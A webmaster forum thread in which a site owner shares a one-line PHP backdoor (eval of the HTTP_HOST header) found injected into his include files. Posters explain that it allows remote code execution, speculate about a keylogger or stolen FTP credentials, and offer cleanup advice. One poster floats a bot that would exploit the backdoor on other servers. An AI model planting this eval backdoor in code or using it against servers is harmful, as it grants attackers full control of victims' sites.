biskoppen

$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is?

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

biskoppen

bump...

Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here..

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

hand-held

In the parlance of our times... j00 g0t 0wn3d.

__________________
Pimp pimp... hooray! Pimp pimp... hooray!

2012

the code basically says "yes, I have a domain" then makes sure its a good one before fucking you and exiting and not finishing anything else ...

whats the rest of your code ?

__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

biskoppen

That was all there was inserted... I think.. I go through it all a little closely

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

bl4h

hmm doesnt make sense to me. how does eval "make sure its good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|

2012

__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

biskoppen

How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

2012

... lots of ways

__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

Tempest

If what I think is true, that will allow someone to run any php code on your site that they want.

sweetpurple04

seems like a conspiracy

__________________

biskoppen

Yes ofcourse.. the eval with do that... hmmm... this looks more and more like an "evil" trespassing...

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

quantum-x

The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.

bl4h

oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !

biskoppen

Ok, I get the whole picture now... isn't that just great

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

swampthing

your not the first person

SmokeyTheBear

is it in the very top or very bottom ?

__________________
hatisblack at yahoo.com

KimJI

two of my clients reported the same thing.

It seems to be part of a botnet/Ddos tool.

What i read is, that code can be send to that host, and ask the host to exechute a remote script

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

SmokeyTheBear

yup , its used by seo spammers to include pages on your server that dont exist.. or a botnet

when was it modified..?

and try going to google and type site:yourdomain.com and see if there are any new pages indexed you dont recognize

__________________
hatisblack at yahoo.com

Miguel T

How the hell can that be placed in EACH ones pages?

__________________

Full Stack Webdeveloper: HTML5/CSS3, jQuery, AJAX, ElevatedX, NATS, MechBunny, Wordpress

KimJI

because the server was compromised

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

digifan

Uh-oh, not fun for sure...

__________________
[email protected]
Webair Rocks

ladida

You're wrong. This will work regardless off register globals. If he found that on his server, he's fucked, as that gives full server access.

__________________
agentGFY *at* gmail.com

just a punk

As I said in other thread it's a way to do php code injection.

__________________
Obey the Cowgod

just a punk

You're wrong. Read this: http://ez.no/layout/set/printarticle...f_csrf_and_xss

__________________
Obey the Cowgod

ladida

They can do alot more then that aswell.

__________________
agentGFY *at* gmail.com

bl4h

you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes

ladida

Lol, ok, no jokes.

__________________
agentGFY *at* gmail.com

CCBillMatthewP

biskoppen,

This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.

__________________

Matthew
Client Support Lead
[email protected]
United States 1-800-510-2859
International 1-888-596-9279

biskoppen

Matthew, any chance you could contact me via ICQ to discuss this?

My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so)

ICQ : 30898463

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

CCBillMatthewP

biskoppen,

Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig.

__________________

Matthew
Client Support Lead
[email protected]
United States 1-800-510-2859
International 1-888-596-9279

potter

Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.

__________________

TheSenator

so... what is the status of this?

Damn CCBill doesn't have access to ICQ! Come on guys!

__________________
ISeekGirls.com since 2005

KimJI

There are other sites and server compromised, Its not only "biskoppen"

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

d-null

I was going to sign up for ccbill soon too.................. watching to see how this develops


and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available.

this really made a lasting impression on me

Pornopat

Pretty sure its not ccbill.

__________________
https://stripcash.com/sign-up/?userI...fff832eb95ab6a

Zoose

The chances this has anything to do with CCBill or anyone at CCBill are basically nil. Either his entire server was compromised, his ftp account with his host was compromised, or possibly a script he runs is vulnerable.

d-null

that makes the most sense

KimJI

I dont get why its not trackable throught the logfiles who did this? have you disabled logging?

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

biskoppen

I was told that my logs is truncated every x hours when the stats is run

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

Tempest

Exactly...

That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had went to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like norton etc. didn't catch it. He was saying you needed something better like Kapersky.

These guys got his server login info and intalled the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re upload them. Happens very fast. It could be that this is another "version" of that.

KimJI

Emagine how much traffic they can steal this way? just a few clicks from each sites can be millions in a few days

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

d-null

damn, almost like a person needs a separate computer for surfing and one for sensitive data and work

KimJI

most serious people have.

__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org

Violetta

time to change your ftp password

__________________
M&A Queen

biskoppen

Been there, done that

__________________
Submit my videos to make bank, tons of 5 minute videos offered right here

Tempest

Scan your computer with Kapersky and Panda (or any other "better" virus programs) maybe first... if you have a keylogger on your system, they'll just get the new password anyway.

RawAlex

Here are some potential sources of infection:

1 - your own PC could be infected, anything from a keylogger to a total owning of your PC.

2 - Someone at CCBill could also have a computer with similar ownage.

3 - Your server maybe have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar.


Basically, sounds like you got owned pretty majorly. start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to looks for holes, including cron tasks, open files, extra users, odd logins, etc.

Good luck.

bu((aneer

FTP passwords are sent via plain/clear text. Very easy to pick them off the wire!

milambur

Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?

__________________
Alea iacta est